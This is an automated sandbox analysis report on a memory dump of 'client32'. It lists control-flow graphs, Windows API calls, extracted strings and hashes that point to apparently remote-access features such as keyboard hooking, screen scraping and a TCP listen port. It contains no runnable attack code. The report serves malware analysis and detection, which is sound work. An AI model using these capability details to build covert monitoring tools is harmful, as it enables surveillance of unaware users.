1102e58c-1102e5a3 2125->2183 2134 1102e6e6-1102e6ea 2126->2134 2129 1102e917-1102e93a 2127->2129 2150 1102e962-1102e96a 2129->2150 2151 1102e93c-1102e942 2129->2151 2139 1102e3ab-1102e3b2 call 11028360 2130->2139 2140 1102e409 2130->2140 2131->2057 2135 1102e706-1102e708 2134->2135 2136 1102e6ec-1102e6ee 2134->2136 2144 1102e70b-1102e70d 2135->2144 2141 1102e702-1102e704 2136->2141 2142 1102e6f0-1102e6f6 2136->2142 2139->2140 2154 1102e3b4-1102e3e6 2139->2154 2140->2057 2141->2144 2142->2135 2148 1102e6f8-1102e700 2142->2148 2144->2127 2144->2149 2148->2134 2148->2141 2157 1102e735-1102e74a call 110b7df0 call 1102a1f0 2149->2157 2158 1102e74c-1102e75f call 11081d30 2149->2158 2159 1102e97c-1102ea08 call 11162777 * 2 call 11147060 * 2 GetCurrentProcessId call 110ee150 call 11028290 call 11147060 call 11162bb7 2150->2159 2160 1102e96c-1102e979 call 11036710 call 11162777 2150->2160 2151->2150 2155 1102e944-1102e95d call 1102d900 2151->2155 2173 1102e3f0-1102e3ff call 110f64d0 2154->2173 2174 1102e3e8-1102e3ee 2154->2174 2155->2150 2192 1102e7a3-1102e7bc call 11081d30 2157->2192 2178 1102e761-1102e784 2158->2178 2179 1102e786-1102e788 2158->2179 2160->2159 2186 1102e402-1102e404 call 1102d900 2173->2186 2174->2173 2174->2186 2178->2192 2189 1102e790-1102e7a1 2179->2189 2194 1102e613-1102e61f 2182->2194 2183->2194 2201 1102e5a5-1102e5ae 2183->2201 2186->2140 2189->2189 2189->2192 2211 1102e7c2-1102e83d call 11147060 call 110cfe80 call 110d16d0 call 110b7df0 wsprintfA call 110b7df0 wsprintfA 2192->2211 2212 1102e8fc-1102e909 _strncpy 2192->2212 2199 1102e662-1102e671 2194->2199 2200 1102e621-1102e62d 2194->2200 2199->2111 2204 1102e673-1102e674 FreeLibrary 2199->2204 2202 1102e63f-1102e643 2200->2202 2203 1102e62f-1102e63d GetProcAddress 2200->2203 2201->2194 2209 1102e5b0-1102e5e6 call 11147060 call 1112c1b0 2201->2209 2207 1102e654-1102e656 SetLastError 2202->2207 2208 1102e645-1102e648 2202->2208 2203->2202 2204->2111 2214 1102e65c 2207->2214 2208->2214 2209->2194 2230 1102e5e8-1102e60e call 11147060 call 11027f80 2209->2230 2243 1102e853-1102e869 call 11129e00 2211->2243 2244 1102e83f-1102e84e call 11029a70 2211->2244 2217 1102e90c-1102e911 CharUpperA 2212->2217 2214->2199 2217->2129 2230->2194 2248 1102e882-1102e8bc call 110d0e20 * 2 2243->2248 2249 1102e86b-1102e87d call 110d0e20 2243->2249 2244->2243 2256 1102e8d2-1102e8fa _strncpy call 110d0a10 2248->2256 2257 1102e8be-1102e8cd call 11029a70 2248->2257 2249->2248 2256->2217 2257->2256
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(Wtsapi32.dll,Client,screenscrape,00000001,00000003,TCPIP,ListenPort,00000000,00000003,00000003,?,?,?,?,?,?), ref: 1102E501
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: $18/11/16 11:28:14 V12.10F20$878411$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                • API String ID: 1029625771-1787036592
                                                                                • Opcode ID: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
                                                                                • Instruction ID: db6713792a15d7fd58b1be38af693bfb3b21aad0558d55bfb54ca6815a31c46c
                                                                                • Opcode Fuzzy Hash: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
                                                                                • Instruction Fuzzy Hash: B1C1EF75E4127A9BEB22CF918C94FEDF7B9BB48308F8044E9E559A7240D6706E80CB51
                                                                                Function 11142010 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 266libraryregistryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2261 11142010-11142051 call 11147060 2264 11142057-111420b3 LoadLibraryA 2261->2264 2265 111420d9-11142103 call 11143a50 call 11147af0 LoadLibraryA 2261->2265 2266 111420b5-111420c0 call 11017a40 2264->2266 2267 111420c7-111420d0 2264->2267 2277 11142105-1114210b 2265->2277 2278 11142133 2265->2278 2266->2267 2274 111420c2 call 110ccc90 2266->2274 2267->2265 2270 111420d2-111420d3 FreeLibrary 2267->2270 2270->2265 2274->2267 2277->2278 2280 1114210d-11142113 2277->2280 2279 1114213d-1114215d GetClassInfoExA 2278->2279 2282 11142163-1114218a call 11162be0 call 11145080 2279->2282 2283 111421fe-11142256 2279->2283 2280->2278 2281 11142115-11142131 call 1105e820 2280->2281 2281->2279 2292 111421a3-111421e5 call 11145080 call 111450b0 LoadCursorA GetStockObject RegisterClassExA 2282->2292 2293 1114218c-111421a0 call 11029a70 2282->2293 2294 11142292-11142298 2283->2294 2295 11142258-1114225e 2283->2295 2292->2283 2316 111421e7-111421fb call 11029a70 2292->2316 2293->2292 2296 111422d4-111422f6 call 1105e820 2294->2296 2297 1114229a-111422a9 call 111101b0 2294->2297 2295->2294 2299 11142260-11142266 2295->2299 2313 11142304-11142309 2296->2313 2314 111422f8-11142302 2296->2314 2311 111422cd 2297->2311 2312 111422ab-111422cb 2297->2312 2299->2294 2304 11142268-1114227f call 1112d770 LoadLibraryA 2299->2304 2304->2294 2320 11142281-1114228d GetProcAddress 2304->2320 2317 111422cf 2311->2317 2312->2317 2318 11142315-1114231b 2313->2318 2319 1114230b 2313->2319 2314->2318 2316->2283 2317->2296 2322 1114231d-11142323 call 110f8230 2318->2322 2323 11142328-11142341 call 1113d9a0 2318->2323 2319->2318 2320->2294 2322->2323 2329 11142347-1114234d 2323->2329 2330 111423e9-111423fa 2323->2330 2331 1114234f-11142361 call 111101b0 2329->2331 2332 11142389-1114238f 2329->2332 2343 11142363-11142379 call 1115e590 2331->2343 2344 1114237b 2331->2344 2334 111423b5-111423c1 2332->2334 2335 11142391-11142397 2332->2335 2338 111423c3-111423c9 2334->2338 2339 111423d8-111423e3 #17 LoadLibraryA 2334->2339 2336 1114239e-111423b0 SetTimer 2335->2336 2337 11142399 call 11135840 2335->2337 2336->2334 2337->2336 2338->2339 2342 111423cb-111423d1 2338->2342 2339->2330 2342->2339 2345 111423d3 call 1112e5e0 2342->2345 2347 1114237d-11142384 2343->2347 2344->2347 2345->2339 2347->2332
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(User32.dll,00000000,?), ref: 11142063
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 111420D3
                                                                                • LoadLibraryA.KERNEL32(imm32,?,?,00000000,?), ref: 111420F6
                                                                                • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 11142155
                                                                                • _memset.LIBCMT ref: 11142169
                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 111421B9
                                                                                • GetStockObject.GDI32(00000000), ref: 111421C3
                                                                                • RegisterClassExA.USER32(?), ref: 111421DA
                                                                                • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,?), ref: 11142272
                                                                                • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11142287
                                                                                • SetTimer.USER32(00000000,00000000,000003E8,1113D980), ref: 111423AA
                                                                                • #17.COMCTL32(?,?,?,00000000,?), ref: 111423D8
                                                                                • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,?), ref: 111423E3
                                                                                  • Part of subcall function 11017A40: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,1B702977,11030346,00000000), ref: 11017A6E
                                                                                  • Part of subcall function 11017A40: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11017A7E
                                                                                  • Part of subcall function 11017A40: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 11017AC2
                                                                                  • Part of subcall function 11017A40: FreeLibrary.KERNEL32(00000000), ref: 11017AE8
                                                                                  • Part of subcall function 110CCC90: CreateWindowExA.USER32(00000000,button,11195264,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CCCC9
                                                                                  • Part of subcall function 110CCC90: SetClassLongA.USER32(00000000,000000E8,110CCA10), ref: 110CCCE0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                                • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                • API String ID: 3706574701-3145203681
                                                                                • Opcode ID: c8cd067e95ed8df30712ab26ad1b5c3d5f0c1ca3db4a3fb2271c70030aa03097
                                                                                • Instruction ID: dd3f645cf5ef2db3b7f5f54c26e54504db449fd0c20b07bc67f1527c65be20eb
                                                                                • Opcode Fuzzy Hash: c8cd067e95ed8df30712ab26ad1b5c3d5f0c1ca3db4a3fb2271c70030aa03097
                                                                                • Instruction Fuzzy Hash: F8A18CB8E02266DFDB01DFE5D9C4AA9FBB4BB0870CF60453EE125A7648E7305484CB55
                                                                                Function 11028C10 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542COMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2350 11028c10-11028c2d 2351 11028c33-11028c62 2350->2351 2352 110292f8-110292ff 2350->2352 2355 11028cf0-11028d38 GetModuleFileNameA call 111640b0 call 11164ead 2351->2355 2356 11028c68-11028c6e 2351->2356 2353 11029311-11029315 2352->2353 2354 11029301-1102930a 2352->2354 2358 11029317-11029329 call 11162bb7 2353->2358 2359 1102932a-1102933e call 11162bb7 2353->2359 2354->2353 2357 1102930c 2354->2357 2371 11028d3d 2355->2371 2361 11028c70-11028c78 2356->2361 2357->2353 2361->2361 2365 11028c7a-11028c80 2361->2365 2366 11028c83-11028c88 2365->2366 2366->2366 2370 11028c8a-11028c94 2366->2370 2372 11028cb1-11028cb7 2370->2372 2373 11028c96-11028c9d 2370->2373 2374 11028d40-11028d4a 2371->2374 2378 11028cb8-11028cbe 2372->2378 2377 11028ca0-11028ca6 2373->2377 2375 11028d50-11028d53 2374->2375 2376 110292ef-110292f7 2374->2376 2375->2376 2379 11028d59-11028d67 call 11026ef0 2375->2379 2376->2352 2377->2377 2380 11028ca8-11028cae 2377->2380 2378->2378 2381 11028cc0-11028cee call 11164ead 2378->2381 2386 11029275-1102928a call 11164c77 2379->2386 2387 11028d6d-11028d80 call 11163ca7 2379->2387 2380->2372 2381->2374 2386->2376 2394 11029290-110292ea 2386->2394 2392 11028d82-11028d85 2387->2392 2393 11028d8b-11028db3 call 11026d60 call 11026ef0 2387->2393 2392->2386 2392->2393 2393->2386 2399 11028db9-11028dd6 call 11026fe0 call 11026ef0 2393->2399 2394->2376 2404 110291e5-110291ec 2399->2404 2405 11028ddc 2399->2405 2407 11029212-11029219 2404->2407 2408 110291ee-110291f1 2404->2408 2406 11028de0-11028e00 call 11026d60 2405->2406 2418 11028e02-11028e05 2406->2418 2419 11028e36-11028e39 2406->2419 2409 11029231-11029238 2407->2409 2410 1102921b-11029221 2407->2410 2408->2407 2412 110291f3-110291fa 2408->2412 2415 1102923a-11029245 2409->2415 2416 11029248-1102924f 2409->2416 2414 11029227-1102922f 2410->2414 2413 11029200-11029210 2412->2413 2413->2407 2413->2413 2414->2409 2414->2414 2415->2416 2420 11029251-1102925b 2416->2420 2421 1102925e-11029265 2416->2421 2422 11028e07-11028e0e 2418->2422 2423 11028e1e-11028e21 2418->2423 2425 110291ce-110291df call 11026ef0 2419->2425 2426 11028e3f-11028e52 call 11165010 2419->2426 2420->2421 2421->2386 2424 11029267-11029272 2421->2424 2427 11028e14-11028e1c 2422->2427 2423->2425 2428 11028e27-11028e31 2423->2428 2424->2386 2425->2404 2425->2406 2426->2425 2433 11028e58-11028e74 call 1116558e 2426->2433 2427->2423 2427->2427 2428->2425 2436 11028e76-11028e7c 2433->2436 2437 11028e8f-11028ea5 call 1116558e 2433->2437 2438 11028e80-11028e88 2436->2438 2442 11028ea7-11028ead 2437->2442 2443 11028ebf-11028ed5 call 1116558e 2437->2443 2438->2438 2440 11028e8a 2438->2440 2440->2425 2444 11028eb0-11028eb8 2442->2444 2448 11028ed7-11028edd 2443->2448 2449 11028eef-11028f05 call 1116558e 2443->2449 2444->2444 2446 11028eba 2444->2446 2446->2425 2451 11028ee0-11028ee8 2448->2451 2454 11028f07-11028f0d 2449->2454 2455 11028f1f-11028f35 call 1116558e 2449->2455 2451->2451 2452 11028eea 2451->2452 2452->2425 2456 11028f10-11028f18 2454->2456 2460 11028f37-11028f3d 2455->2460 2461 11028f4f-11028f65 call 1116558e 2455->2461 2456->2456 2458 11028f1a 2456->2458 2458->2425 2462 11028f40-11028f48 2460->2462 2466 11028f67-11028f6d 2461->2466 2467 11028f7f-11028f95 call 1116558e 2461->2467 2462->2462 2464 11028f4a 2462->2464 2464->2425 2468 11028f70-11028f78 2466->2468 2472 11028f97-11028f9d 2467->2472 2473 11028faf-11028fc5 call 1116558e 2467->2473 2468->2468 2470 11028f7a 2468->2470 2470->2425 2474 11028fa0-11028fa8 2472->2474 2478 11028fc7-11028fcd 2473->2478 2479 11028fdf-11028ff5 call 1116558e 2473->2479 2474->2474 2476 11028faa 2474->2476 2476->2425 2481 11028fd0-11028fd8 2478->2481 2484 11028ff7-11028ffd 2479->2484 2485 1102900f-11029025 call 1116558e 2479->2485 2481->2481 2483 11028fda 2481->2483 2483->2425 2486 11029000-11029008 2484->2486 2490 11029027-1102902d 2485->2490 2491 1102903f-11029055 call 1116558e 2485->2491 2486->2486 2488 1102900a 2486->2488 2488->2425 2492 11029030-11029038 2490->2492 2496 11029057-1102905d 2491->2496 2497 1102906f-11029085 call 1116558e 2491->2497 2492->2492 2494 1102903a 2492->2494 2494->2425 2499 11029060-11029068 2496->2499 2502 110290a6-110290bc call 1116558e 2497->2502 2503 11029087-1102908d 2497->2503 2499->2499 2500 1102906a 2499->2500 2500->2425 2508 110290d3-110290e9 call 1116558e 2502->2508 2509 110290be 2502->2509 2504 11029097-1102909f 2503->2504 2504->2504 2506 110290a1 2504->2506 2506->2425 2514 11029100-11029116 call 1116558e 2508->2514 2515 110290eb 2508->2515 2510 110290c4-110290cc 2509->2510 2510->2510 2512 110290ce 2510->2512 2512->2425 2520 11029137-1102914d call 1116558e 2514->2520 2521 11029118-1102911e 2514->2521 2516 110290f1-110290f9 2515->2516 2516->2516 2518 110290fb 2516->2518 2518->2425 2526 1102916f-11029185 call 1116558e 2520->2526 2527 1102914f-1102915f 2520->2527 2522 11029128-11029130 2521->2522 2522->2522 2524 11029132 2522->2524 2524->2425 2532 11029187-1102918d 2526->2532 2533 1102919c-110291b2 call 1116558e 2526->2533 2529 11029160-11029168 2527->2529 2529->2529 2531 1102916a 2529->2531 2531->2425 2534 11029190-11029198 2532->2534 2533->2425 2538 110291b4-110291ba 2533->2538 2534->2534 2536 1102919a 2534->2536 2536->2425 2539 110291c4-110291cc 2538->2539 2539->2425 2539->2539
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,74351370,?,0000001A), ref: 11028CFD
                                                                                • _strrchr.LIBCMT ref: 11028D0C
                                                                                  • Part of subcall function 1116558E: __stricmp_l.LIBCMT ref: 111655CB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileModuleName__stricmp_l_strrchr
                                                                                • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                • API String ID: 1609618855-357498123
                                                                                • Opcode ID: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                                • Instruction ID: 6dd15402a7eb79c0789e25bc58f14fe58cbd6334f89e1d0f8744b7b944579b3b
                                                                                • Opcode Fuzzy Hash: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
                                                                                • Instruction Fuzzy Hash: 86120738D052A68FDB16CF64CC84BE8B7F4AB1634CF5000EED9D597601EB72568ACB52
                                                                                Function 11030EF3 Relevance: 40.6, APIs: 10, Strings: 13, Instructions: 350registryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2540 11030ef3-11030f1a RegOpenKeyExA 2541 11030f20-11030f4f call 11143bd0 2540->2541 2542 1103103d-1103105b 2540->2542 2550 11031030-11031037 RegCloseKey 2541->2550 2551 11030f55-11030f72 call 11163ca7 call 111648ed 2541->2551 2546 11031061-1103107b 2542->2546 2547 11031135-1103113f 2542->2547 2548 11031081-1103109f call 111101b0 call 11109bc0 2546->2548 2547->2548 2549 11031145-11031168 call 111101b0 call 110fae60 2547->2549 2565 110310a4-110312d6 2548->2565 2570 110312db-1103131f GetStockObject GetObjectA 2549->2570 2550->2542 2567 11030f86-11030f89 2551->2567 2568 11030f74-11030f84 call 111648ed 2551->2568 2565->2570 2572 11030f8b 2567->2572 2573 11030f8c-11030f98 call 11163ca7 2567->2573 2568->2567 2577 11031321 2570->2577 2578 1103132b-11031497 SetErrorMode * 2 call 111101b0 call 11028980 call 111101b0 call 11028980 InterlockedExchange call 111101b0 call 1108a880 GetACP call 11163f93 call 111663a3 call 11143770 call 11143780 call 111101b0 call 11061aa0 2570->2578 2572->2573 2573->2550 2581 11030f9e-11030faa 2573->2581 2577->2578 2621 11031499 2578->2621 2622 1103149f-110314a5 2578->2622 2581->2550 2582 11030fb0-11030fb3 2581->2582 2582->2550 2584 11030fb5-1103100c call 11143bd0 * 2 2582->2584 2593 11031011-1103101c 2584->2593 2593->2550 2595 1103101e-1103102a 2593->2595 2595->2550 2621->2622 2623 110314e1-110315f6 call 110ccc90 call 111101b0 call 11125d40 call 11114fb0 call 111101b0 call 11088b30 call 111101b0 call 1105cdb0 call 11110270 call 1105d1a0 call 11027810 call 1100d620 2622->2623 2624 110314a7-110314dc call 111101b0 call 11061710 2622->2624 2665 11031749-11031776 call 110edb10 call 11162bb7 2623->2665 2666 110315fc-11031610 call 1100d330 call 11147060 2623->2666 2624->2623 2666->2665
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNEL32 ref: 11030F12
                                                                                • RegCloseKey.KERNEL32(?), ref: 11031037
                                                                                  • Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912
                                                                                • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                                • InterlockedExchange.KERNEL32(012F8D80,00001388), ref: 110313BA
                                                                                • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                                  • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,76968400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorModeObject$CloseExchangeInterlockedOpenQueryStockValue__isdigit_l
                                                                                • String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$SOFTWARE\Microsoft\Windows NT\CurrentVersion$j0U$pcicl32$&$*$j$
                                                                                • API String ID: 1620732580-3468083601
                                                                                • Opcode ID: 57ef328ae7d238af9a72f0207df80887d2bea8460ebc5795ade3b7fe5304f569
                                                                                • Instruction ID: ba3a9277cc9c02863ea6a287e3bfaf4f3c25cdbc6a51068d255f8e3b0b30a81f
                                                                                • Opcode Fuzzy Hash: 57ef328ae7d238af9a72f0207df80887d2bea8460ebc5795ade3b7fe5304f569
                                                                                • Instruction Fuzzy Hash: A0D10AB0E153659FEF11CBB48C84BEEFBF4AB84308F1445E9E419A7284EB756A40CB51
                                                                                Function 110869D0 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2675 110869d0-110869ed call 110869c0 2678 110869ef-110869ff call 11162bb7 2675->2678 2679 11086a00-11086a10 call 111457a0 2675->2679 2684 11086a12-11086a1a 2679->2684 2684->2684 2685 11086a1c-11086a22 2684->2685 2686 11086a23-11086a29 2685->2686 2686->2686 2687 11086a2b-11086a62 LoadLibraryA 2686->2687 2688 11086ac9-11086ade GetProcAddress 2687->2688 2689 11086a64-11086a6b 2687->2689 2690 11086b6c-11086b7d call 11162bb7 2688->2690 2691 11086ae4-11086af3 GetProcAddress 2688->2691 2692 11086a6d-11086abe GetModuleFileNameA call 11081e00 LoadLibraryA 2689->2692 2693 11086ac0-11086ac3 2689->2693 2691->2690 2694 11086af5-11086b04 GetProcAddress 2691->2694 2692->2693 2693->2688 2693->2690 2694->2690 2697 11086b06-11086b15 GetProcAddress 2694->2697 2697->2690 2700 11086b17-11086b26 GetProcAddress 2697->2700 2700->2690 2701 11086b28-11086b37 GetProcAddress 2700->2701 2701->2690 2702 11086b39-11086b48 GetProcAddress 2701->2702 2702->2690 2703 11086b4a-11086b59 GetProcAddress 2702->2703 2703->2690 2704 11086b5b-11086b6a GetProcAddress 2703->2704 2704->2690 2705 11086b7e-11086b93 call 11162bb7 2704->2705
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 11086A5C
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11086A7A
                                                                                • LoadLibraryA.KERNEL32(?), ref: 11086ABC
                                                                                • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086AD7
                                                                                • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 11086AEC
